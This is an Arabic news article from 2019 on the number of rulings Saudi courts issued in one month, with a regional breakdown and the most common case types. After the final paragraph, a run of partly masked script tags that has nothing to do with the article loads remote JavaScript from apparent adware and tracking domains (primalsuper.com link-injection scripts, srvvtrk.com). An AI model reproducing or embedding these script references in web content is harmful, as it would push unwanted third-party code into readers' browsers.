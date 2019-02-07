شكرا لقرائتكم خبر عن الشرقية الثالثة في الأحكام القضائية خلال جمادى الأولى والان نبدء بالتفاصيل

المبالغ المالية وإثبات الطلاق وحصر الورثة أبرز الدعاوى

أصدرت محاكم المملكة 75534 حكما خلال شهر جمادى الأولى الماضي بارتفاع 28% عن شهر ربيع الآخر الماضي بواقع 58918 حكما.

وكشفت منصة ذكاء الأعمال بوزارة العدل أن محاكم منطقة مكة المكرمة تصدرت القائمة بعدد 20398 حكما، تلتها الرياض بعدد 20254 حكما، ثم المنطقة الشرقية بـ9878 حكما، فيما سجلت منطقة عسير 5369 حكما، ثم منطقة المدينة المنورة 4736 حكما، وجاءت القصيم في المرتبة السادسة بعدد 3745 حكما، تلتها منطقة جازان بعدد 2346 حكما، ثم منطقة تبوك 2249 حكما، ومنطقة حائل 1804 أحكام، وأصدرت محاكم منطقة الجوف 1345 حكما، كما أصدرت محاكم منطقة نجران 1295 حكما، تلتها منطقة الباحة بـ 1164 حكما، ثم 951 بمحاكم منطقة الحدود الشمالية، مسجلة أقل الأحكام خلال نفس الفترة.

وشملت أبرز القضايا التي صدرت فيها الأحكام خلال الفترة، دعاوى في مبالغ مالية، إثبات طلاق، دعاوى مالية بعشرين ألف ريال فما دون، إثبات وفاة وحصر ورثة، دعاوى مالية بأجرة عقار، إضافة إلى دعاوى نفقة، وطلب حجج استحكام جديدة وغيرها.

وقفزت وزارة العدل بمتوسط إنجاز العمليات العدلية خلال الفترة الماضية بفضل الله ثم التحوّل الرقمي في مسار العمليات في جميع المرافق العدلية، بما أسهم في تقليل مُدد التقاضي، إلى جانب القرارات الصادرة من وزير العدل رئيس المجلس الأعلى للقضاء الشيخ د. وليد الصمعاني، لتطوير وتجويد الخدمة العدلية وبناء نموذج للقضاء المؤسسي . ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_460289094&key=1fd3b038f796d0b159&cv=1549460031&t=1549460030713" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_607201702&key=1fd3b038f796d0b159&cv=9626&t=1549460030714" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549460030722" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********